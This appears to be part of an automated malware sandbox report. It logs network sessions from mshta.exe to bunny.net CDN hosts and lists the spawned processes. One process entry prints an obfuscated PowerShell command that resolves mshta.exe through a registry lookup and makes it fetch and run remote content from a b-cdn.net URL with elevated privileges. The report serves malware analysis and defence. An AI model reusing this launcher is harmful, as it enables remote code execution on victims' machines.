                      CDN-EdgeStorageId: 1082
                      CDN-Status: 200
                      CDN-RequestId: 8f381e875b12b8282f44cda690957dd7
                      CDN-Cache: HIT
                      Accept-Ranges: bytes
                      2024-09-17 06:32:06 UTC1199INData Raw: ef bb bf 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 75 62 69 6b 27 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 62 75 6e 6e 79 63 64 6e 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 32 2f 69 6d 61 67 65 73 2f 67 65 6e 65 72 61 6c 2f 69 6c 2d 62 67 2d 62 6c 61 63 6b 2d 66 6c 6f 77 65 72 2e 73 76 67 29 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0d 0a 20 20
                      Data Ascii: html, body { width: 100%; margin: 0; padding: 0; text-align: center; font-family: 'Rubik'; background-image: url(https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg); background-repeat: no-repeat;


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.649714169.150.247.384437156C:\Windows\System32\mshta.exe
                      TimestampBytes transferredDirectionData
                      2024-09-17 06:32:06 UTC384OUTGET /v2/images/bunnynet-logo.svg HTTP/1.1
                      Accept: */*
                      Referer: https://fatodex.b-cdn.net/fatodex
                      Accept-Language: en-CH
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                      Host: bunny.net
                      Connection: Keep-Alive
                      2024-09-17 06:32:21 UTC411INHTTP/1.1 502 Bad Gateway
                      Date: Tue, 17 Sep 2024 06:32:21 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Server: BunnyCDN-DE1-1081
                      CDN-PullZone: 876725
                      CDN-Uid: 3a60ca70-b89d-4cd5-a4b5-34a3468d7e0f
                      CDN-RequestCountryCode: US
                      ErrorCode: 100
                      CDN-Status: 502
                      CDN-RequestId: 357593c858f27d2870f13ea0d9f74e56
                      CDN-Cache: MISS
                      cache-control: public, max-age=0, must-revalidate
                      2024-09-17 06:32:21 UTC1954INData Raw: 37 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 75 6e 6e 79 6e 65 74 61 73 73 65 74 73 2e 62 2d 63 64 6e 2e 6e 65 74 2f 65 72 72 6f 72 2e 70 6e 67 22 20 2f 3e 0d
                      Data Ascii: 79b<!DOCTYPE html><html><head> <title>502 Bad Gateway</title> <meta name="viewport" content="width=device-width, initial-scale=1" /> <link rel="icon" type="image/png" sizes="16x16" href="https://bunnynetassets.b-cdn.net/error.png" />
                      2024-09-17 06:32:21 UTC5INData Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.649716169.150.236.1044437156C:\Windows\System32\mshta.exe
                      TimestampBytes transferredDirectionData
                      2024-09-17 06:32:06 UTC355OUTGET /css?family=Rubik:300,400,500,700,900 HTTP/1.1
                      Accept: */*
                      Accept-Language: en-CH
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                      Connection: Keep-Alive
                      Host: fonts.bunny.net
                      2024-09-17 06:32:06 UTC936INHTTP/1.1 200 OK
                      Date: Tue, 17 Sep 2024 06:32:06 GMT
                      Content-Type: text/css; charset=utf-8
                      Content-Length: 14730
                      Connection: close
                      Vary: Accept-Encoding
                      Server: BunnyCDN-IL1-1206
                      CDN-PullZone: 781720
                      CDN-Uid: 3a60ca70-b89d-4cd5-a4b5-34a3468d7e0f
                      CDN-RequestCountryCode: US
                      Access-Control-Allow-Origin: *
                      Access-Control-Allow-Headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
                      Access-Control-Expose-Headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
                      Cache-Control: public, max-age=2592000
                      Last-Modified: Mon, 02 Sep 2024 16:30:33 GMT
                      CDN-ProxyVer: 1.04
                      CDN-RequestPullSuccess: True
                      CDN-RequestPullCode: 200
                      CDN-CachedAt: 09/02/2024 16:30:33
                      CDN-EdgeStorageId: 941
                      CDN-Status: 200
                      CDN-RequestId: f7cba5afe83db99b8c69f5d5980cd7a5
                      CDN-Cache: HIT
                      Accept-Ranges: bytes
                      2024-09-17 06:32:06 UTC14730INData Raw: 2f 2a 20 6c 61 74 69 6e 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 75 62 69 6b 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 66 6f 6e 74 2d 73 74 72 65 74 63 68 3a 20 31 30 30 25 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 62 75 6e 6e 79 2e 6e 65 74 2f 72 75 62 69 6b 2f 66 69 6c 65 73 2f 72 75 62 69 6b 2d 6c 61 74 69 6e 2d 33 30 30 2d 6e 6f 72 6d 61 6c 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 2c 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 62 75 6e 6e 79 2e 6e 65 74 2f 72 75 62 69 6b 2f 66 69 6c 65 73 2f 72 75 62 69 6b 2d 6c 61
                      Data Ascii: /* latin */@font-face { font-family: 'Rubik'; font-style: normal; font-weight: 300; font-stretch: 100%; src: url(https://fonts.bunny.net/rubik/files/rubik-latin-300-normal.woff2) format('woff2'), url(https://fonts.bunny.net/rubik/files/rubik-la


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      4192.168.2.649717169.150.247.394437156C:\Windows\System32\mshta.exe
                      TimestampBytes transferredDirectionData
                      2024-09-17 06:32:07 UTC407OUTGET /assets/v2/images/general/il-bg-black-flower.svg HTTP/1.1
                      Accept: */*
                      Referer: https://fatodex.b-cdn.net/fatodex
                      Accept-Language: en-CH
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                      Host: bunnycdn.com
                      Connection: Keep-Alive
                      2024-09-17 06:32:08 UTC634INHTTP/1.1 200 OK
                      Date: Tue, 17 Sep 2024 06:32:08 GMT
                      Content-Type: image/svg+xml
                      Content-Length: 7267
                      Connection: close
                      Vary: Accept-Encoding
                      Server: BunnyCDN-DE1-1082
                      CDN-PullZone: 390
                      CDN-Uid: 51eb4203-ff94-48c6-99a5-954f277b91de
                      CDN-RequestCountryCode: US
                      Cache-Control: public, max-age=2592000
                      ETag: "0441a772deeda1:0"
                      Last-Modified: Wed, 14 Aug 2024 09:36:40 GMT
                      Backend: 1
                      CDN-ProxyVer: 1.04
                      CDN-RequestPullSuccess: True
                      CDN-RequestPullCode: 200
                      CDN-CachedAt: 08/23/2024 21:04:11
                      CDN-EdgeStorageId: 1079
                      CDN-Status: 200
                      CDN-RequestId: 975b39ec94dcdf8e859774b6df0da6a1
                      CDN-Cache: HIT
                      Accept-Ranges: bytes
                      2024-09-17 06:32:08 UTC7267INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 38 38 30 70 78 22 20 68 65 69 67 68 74 3d 22 31 34 32 34 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 38 38 30 20 31 34 32 34 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 65 6e 65 72 61 74 6f 72 3a 20 53 6b 65 74 63 68 20 35 32 2e 35 20 28 36 37 34 36 39 29 20 2d 20 68 74 74 70 3a 2f 2f 77 77 77 2e 62 6f 68 65 6d 69 61 6e
                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg width="2880px" height="1424px" viewBox="0 0 2880 1424" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> ... Generator: Sketch 52.5 (67469) - http://www.bohemian


                      Click to jump to process

                      Click to jump to process

                      Click to dive into process behavior distribution

                      Click to jump to process

                      Target ID:0
                      Start time:02:32:00
                      Start date:17/09/2024
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://fatodex.b-cdn.net/fatodex
                      Imagebase:0x7ff6e3d50000
                      File size:452'608 bytes
                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:1
                      Start time:02:32:00
                      Start date:17/09/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff66e660000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:3
                      Start time:02:32:03
                      Start date:17/09/2024
                      Path:C:\Windows\System32\mshta.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\system32\mshta.exe" https://fatodex.b-cdn.net/fatodex
                      Imagebase:0x7ff7f2520000
                      File size:14'848 bytes
                      MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:false

                      Target ID:5
                      Start time:02:32:06
                      Start date:17/09/2024
                      Path:C:\Windows\System32\svchost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Imagebase:0x7ff7403e0000
                      File size:55'320 bytes
                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      No disassembly